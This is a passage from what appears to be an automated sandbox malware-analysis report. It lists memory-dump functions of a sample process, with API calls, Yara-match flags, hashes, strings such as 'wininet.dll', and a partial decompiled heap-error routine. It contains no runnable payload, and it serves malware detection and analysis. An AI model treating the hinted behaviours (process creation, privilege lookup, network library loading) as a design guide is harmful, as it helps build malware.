                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 066fdf986e8639b00bc1bd27a9cc8786f07553a9294365ef7d0be7394ccd2ca2
                          • Instruction ID: a11decfb232dd929d1d9089bf258e065970c22522b2a7909be82cf9ae60b8100
                          • Opcode Fuzzy Hash: 066fdf986e8639b00bc1bd27a9cc8786f07553a9294365ef7d0be7394ccd2ca2
                          • Instruction Fuzzy Hash: 4690027120100842F20071594404B46004597E0345F51C52AA11197A4D8665D8557561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4adbf449137ae7469fd7f40b60e66977376087cfa8b429f2356f858d637e330b
                          • Instruction ID: 0f77440b90b5ad50b9c1dff4e79f60990e2b954294149fbc6adb896074b866db
                          • Opcode Fuzzy Hash: 4adbf449137ae7469fd7f40b60e66977376087cfa8b429f2356f858d637e330b
                          • Instruction Fuzzy Hash: 5490027120108802F2107159840474A004597D0345F55C925A54197A8D86E5D8957161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 38afef37d746a1243a2e59517d1688e9d1f83766cb89a30421d543b26107f5f1
                          • Instruction ID: c2340ab7d285caab10a69f8ca5a0033f20559182ae030ca68438bfb5b1cdc4e0
                          • Opcode Fuzzy Hash: 38afef37d746a1243a2e59517d1688e9d1f83766cb89a30421d543b26107f5f1
                          • Instruction Fuzzy Hash: 1490026121180042F30075694C14B07004597D0347F51C629A11496A4CC965D8656561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: eba551eeff3cc6d1e9b4c298174ac78d54cbafcd0b0588cf5786ce25bcf8b69e
                          • Instruction ID: bf86f4ce58ab565883a3094dd4983e85e1dc214f21d955f8218609d1724988a6
                          • Opcode Fuzzy Hash: eba551eeff3cc6d1e9b4c298174ac78d54cbafcd0b0588cf5786ce25bcf8b69e
                          • Instruction Fuzzy Hash: 7790027120504842F24071594404A46005597D0349F51C525A10597E4D9675DD59B6A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5a2a5b5e4cc97bda126d51bb37bf9f565395f2676993d77498acf85a28ebc311
                          • Instruction ID: 30853b4f360603ea24e65dde666213be8e1249ec47cc286e52ab32ca1184f1d6
                          • Opcode Fuzzy Hash: 5a2a5b5e4cc97bda126d51bb37bf9f565395f2676993d77498acf85a28ebc311
                          • Instruction Fuzzy Hash: CE90027120100802F2807159440464A004597D1345F91C529A101A7A4DCA65DA5D77E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c973becb07a33b517a42fda887b4b62ca542e5fcd3bfc9e37cf4813048597545
                          • Instruction ID: 791aaf9799e4ca65864ef2b79c34e17d34040197733228a8c42dc6782693c402
                          • Opcode Fuzzy Hash: c973becb07a33b517a42fda887b4b62ca542e5fcd3bfc9e37cf4813048597545
                          • Instruction Fuzzy Hash: 2890026921300002F2807159540860A004597D1246F91D929A100A6A8CC965D86D6361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a3616901aad916f133b2525f8879e90cf85ce5b069874a96dc32bad9b74473f4
                          • Instruction ID: 3a196a4b3acda9473762b40c35ca4b5feb2ac335f71bd01889599f0bc4ae8598
                          • Opcode Fuzzy Hash: a3616901aad916f133b2525f8879e90cf85ce5b069874a96dc32bad9b74473f4
                          • Instruction Fuzzy Hash: D790027131114402F21071598404706004597D1245F51C925A18196A8D86E5D8957162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 52f3ba7bfe921ba18f4c4a9c10c64db60d0ef9a8ea47bc4766fa000cc3348c8a
                          • Instruction ID: 6375454950c2e7e05464eef2116bb50f46d2fa5988a1af28ca59ec05720c9454
                          • Opcode Fuzzy Hash: 52f3ba7bfe921ba18f4c4a9c10c64db60d0ef9a8ea47bc4766fa000cc3348c8a
                          • Instruction Fuzzy Hash: D690027120100402F20075995408646004597E0345F51D525A60196A5EC6B5D8957171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D3722E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66threadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D372DA
                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D372FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3333
                          • API String ID: 1836367815-2924271548
                          • Opcode ID: 87a67b6dfaa8c0a52ea5cad62cf472c4dd859485f4348dcc458352b2a8b6e539
                          • Instruction ID: 33c0257df7b16d7bc4890653b404321036f63a8fa7569c20b286b1e79ef6d8e3
                          • Opcode Fuzzy Hash: 87a67b6dfaa8c0a52ea5cad62cf472c4dd859485f4348dcc458352b2a8b6e539
                          • Instruction Fuzzy Hash: 6611E976A806197BEB25A694CC51FFE7259AF41B10F088018FE04BA3C0DB94AD0186F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D47300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02D473A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 661791c32ab4badc8b496209cc5e43eec8ee6a8de77b5c5fe4b5047ad621ebf5
                          • Instruction ID: 924699fd32268a9fe28cf48e32b47767b5633697a0f692c7c511b6773b282dfe
                          • Opcode Fuzzy Hash: 661791c32ab4badc8b496209cc5e43eec8ee6a8de77b5c5fe4b5047ad621ebf5
                          • Instruction Fuzzy Hash: CC318EB6501600ABD711EF64C8A4FA7B7B9EF88700F00851DFA595B241DB70B845CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D472F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02D473A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 41a9bd510e4ae799b005cb443832bd329ce0d2d38a1b9878098abf4b92df41e3
                          • Instruction ID: 5b3967265050d8735935e159133428efbd02d98855987a0cd3f54e8b47813c5f
                          • Opcode Fuzzy Hash: 41a9bd510e4ae799b005cb443832bd329ce0d2d38a1b9878098abf4b92df41e3
                          • Instruction Fuzzy Hash: A2218EB1A41200ABD711EF64C8A5FABB7A8EB88704F50856DFA595B341DB70A845CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D47426, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D3CCF0,?,?), ref: 02D4746C
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID: net.dll
                          • API String ID: 2422867632-2431746569
                          • Opcode ID: fa58eb80f5fc54b659ce0af7a1d61e98b310af39d19a20111f5179b807cdc86f
                          • Instruction ID: 9c5433927543dee2a90077638b304419d55bc8dd3c19892ecaba9ee092db2e4f
                          • Opcode Fuzzy Hash: fa58eb80f5fc54b659ce0af7a1d61e98b310af39d19a20111f5179b807cdc86f
                          • Instruction Fuzzy Hash: 6B0128726412403BD3216A78DC11FA7B758DB82B14F54016EFA9D9B3C1DF61E80587E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D488E4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D33B93), ref: 02D4891D
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: d74bb4c363b2c1c4171fe5f3ef33179db26ae8988d7108bf703167d29fcc45f2
                          • Instruction ID: 435c10139156961aa849c9d6098585b805313c5263c1c6dd6c33e8ef71290918
                          • Opcode Fuzzy Hash: d74bb4c363b2c1c4171fe5f3ef33179db26ae8988d7108bf703167d29fcc45f2
                          • Instruction Fuzzy Hash: 68E0EDB1610604ABCB28DF64CC49EEB37A8EF48340F004658F90CA7200DB31E900CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D488F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D33B93), ref: 02D4891D
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 00ed4fb9d68c6a736f3c1c92c947f9e5efe1195e6a54e3256590874bff4d42d9
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: DEE012B1200208ABDB18EF99CC48EA777ADEF88750F018558FA085B241CA30E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D37280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D372DA
                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D372FB
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                          • Instruction ID: d6c421d32aa115a18cd737f26f42f1fcb86c69be48e4997918142fe7a68775f8
                          • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                          • Instruction Fuzzy Hash: E301A772A8022977F721A6949C42FFE776CAB40B51F144114FF04BA2C1EAD46D0586F5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D39B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D39BB2
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: db272627498e5a196e2415ef016f69def4477bf2b3557ac0a89fdff8f90cb457
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: BB010CB6D4020DABDF10DBA5DC91FDEB3799B54208F004195A90897284FA71EA14CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D48960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D489B4
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: cdc3826663c047185e4286d205f7ea84bfd60e8800475e03e9903c7aba8ad6ce
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: A301AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D4895D, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D489B4
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: c6e132eaf611016391aef1a3cb6d7760f5456f75b98029b77d7304bbad627204
                          • Instruction ID: 7305d05170e06b59b48737ed61db411d1249394c2e31c5bfa709715d2accec54
                          • Opcode Fuzzy Hash: c6e132eaf611016391aef1a3cb6d7760f5456f75b98029b77d7304bbad627204
                          • Instruction Fuzzy Hash: 6F01F2B2204148ABCB04CF88DC80DEB37BDAF8C310F158258FE4997201CA30E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D47430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D3CCF0,?,?), ref: 02D4746C
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                          • Instruction ID: 5bb66b6710fbc4ec177f1f52e88e2fc2db9397535e2907b23b5ffa3ad09ec799
                          • Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                          • Instruction Fuzzy Hash: 48E092333813043BE73065ADAC02FA7B39DCB81B24F550036FA4DEB2C0D995F80146A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D48A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D3CFC2,02D3CFC2,?,00000000,?,?), ref: 02D48A80
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: be53f893bc0ebb260ec9c917e357f85dbaa181f554e1434ff721ace5890fb470
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: 07E01AB12002086BDB10DF49CC84EE737ADEF88650F018154FA0857241C930E910CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D488B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(02D43536,?,02D43CAF,02D43CAF,?,02D43536,?,?,?,?,?,00000000,00000000,?), ref: 02D488DD
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction ID: d671c4f2dd4917e9b93d610a77c7e7f0dd0e09e133da2b939c5c3145f1c02b52
                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction Fuzzy Hash: 98E012B1200208ABDB14EF99CC44EA777ADEF88650F118558FA085B241CA30F910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D3D427, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02D37C83,?), ref: 02D3D45B
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: 4d488a0eef443307434df5def5ff895106a2d6fbd5c1d8f339a176cbbb96d138
                          • Instruction ID: d56aa5667161ca12ad876fe9300c05ff54b233bf5784c5262a9560123039751f
                          • Opcode Fuzzy Hash: 4d488a0eef443307434df5def5ff895106a2d6fbd5c1d8f339a176cbbb96d138
                          • Instruction Fuzzy Hash: A7E08C726503062BE704EEA48C02F66779AAB82A18F494068F5489B283DB20E90186A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D3D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02D37C83,?), ref: 02D3D45B
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction ID: 701e220cd9f58c7a7dc555cc571a6a2c74ee19a9ded5dceaa0a12665eb5efc7b
                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction Fuzzy Hash: ABD05E617503042BE610AAA89C02F26328A9B45A54F494064FA48963C3DA50E8008561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d46803482c88a3ebd1ffa5b621a70351ce37a08a8324fa0302d21257b0b565f9
                          • Instruction ID: 1b36e35f4bb1a22d09ebf41461b5660fd629f04c6714d2fc3d9530143f428cf2
                          • Opcode Fuzzy Hash: d46803482c88a3ebd1ffa5b621a70351ce37a08a8324fa0302d21257b0b565f9
                          • Instruction Fuzzy Hash: 1FB09BB19014C5C9F711E7604608717794077D1745F27C566D3424791B4778D095F5F5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0492B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                          Download Yara Rule
                          Strings
                          • read from, xrefs: 0492B4AD, 0492B4B2
                          • The resource is owned shared by %d threads, xrefs: 0492B37E
                          • <unknown>, xrefs: 0492B27E, 0492B2D1, 0492B350, 0492B399, 0492B417, 0492B48E
                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0492B3D6
                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0492B2F3
                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0492B323
                          • a NULL pointer, xrefs: 0492B4E0
                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0492B314
                          • *** enter .cxr %p for the context, xrefs: 0492B50D
                          • The resource is owned exclusively by thread %p, xrefs: 0492B374
                          • The instruction at %p referenced memory at %p., xrefs: 0492B432
                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0492B484
                          • *** enter .exr %p for the exception record, xrefs: 0492B4F1
                          • Go determine why that thread has not released the critical section., xrefs: 0492B3C5
                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0492B2DC
                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0492B305
                          • *** then kb to get the faulting stack, xrefs: 0492B51C
                          • The critical section is owned by thread %p., xrefs: 0492B3B9
                          • This failed because of error %Ix., xrefs: 0492B446
                          • *** Inpage error in %ws:%s, xrefs: 0492B418
                          • write to, xrefs: 0492B4A6
                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0492B47D
                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0492B352
                          • an invalid address, %p, xrefs: 0492B4CF
                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0492B476
                          • *** An Access Violation occurred in %ws:%s, xrefs: 0492B48F
                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0492B53F
                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0492B38F
                          • The instruction at %p tried to %s , xrefs: 0492B4B6
                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0492B39B
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                          • API String ID: 0-108210295
                          • Opcode ID: 17e2baf55ac4197b4d59181a73694f1c29db2ca359b336449941675be93caf96
                          • Instruction ID: 7f27623ab060a2d6f1cc857e1f8d9f0b81d94b166de31882f78579609ccf5fe8
                          • Opcode Fuzzy Hash: 17e2baf55ac4197b4d59181a73694f1c29db2ca359b336449941675be93caf96
                          • Instruction Fuzzy Hash: 6C81AA31B01220FFEB21AE05CC89D7B3BAAEF86765F018564F5055B256E264B401EFB2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04931C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                          Download Yara Rule
                          C-Code - Quality: 44%
                          			E04931C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x48548a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0487B150();
				} else {
					E0487B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x496589c);
				E0487B150("Heap error detected at %p (heap handle %p)\n",  *0x49658a0);
				_t27 =  *0x4965898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04931E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
